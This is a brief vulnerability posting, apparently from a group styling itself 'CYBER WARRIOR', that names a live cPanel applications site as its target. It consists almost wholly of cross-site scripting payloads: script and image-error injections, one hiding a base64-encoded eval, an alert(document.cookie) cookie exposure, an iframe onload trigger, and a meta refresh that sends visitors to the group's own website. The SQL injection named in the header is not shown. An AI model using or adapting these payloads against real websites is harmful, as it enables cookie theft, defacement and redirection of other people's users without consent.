<------------------- header data start ------------------- >
#############################################################
# Application Name : cpanel Sql Inj &XSS Vuln. & Meta
# Vulnerable Type : Cross Site Scripting
# Author : CYBER WARRIOR - AaCcTt
# Target : https://applications.cpanel.com/
#############################################################
< ------------------- / header data end of ------------------- >
< -- bug code end of -- >
<h1>><img src=alert(’CYBER WARRIOR Bug Researchers AaCcTt’); <h1>><img onerror=eval(atob(’YWxlcnQoIkNZQkVSIFdBUlJJT1IgQnVnIFJlc2VhcmNoZXJzIEFhQ2NUdCIp’)) src=asd<h1>/**/# >>
><script>alert(’CYBER WARRIOR Bug Researchers AaCcTt’)</script>
><script>alert(document.cookie)</script>><marquee><h1>CYBER WARRIOR Bug Researchers AaCcTt</h1></marquee>
><iframe onload=alert(/CYBER WARRIOR Bug Researchers AaCcTt/)>
</TITLE><sCRipT>alert(CYBER WARRIOR Bug Researchers AaCcTt);</sCRipT><TITLE>
Meta
<meta http-equiv=refresh content=0;URL=http://www.cyber-warrior.org/>
< -- / bug code end of -- >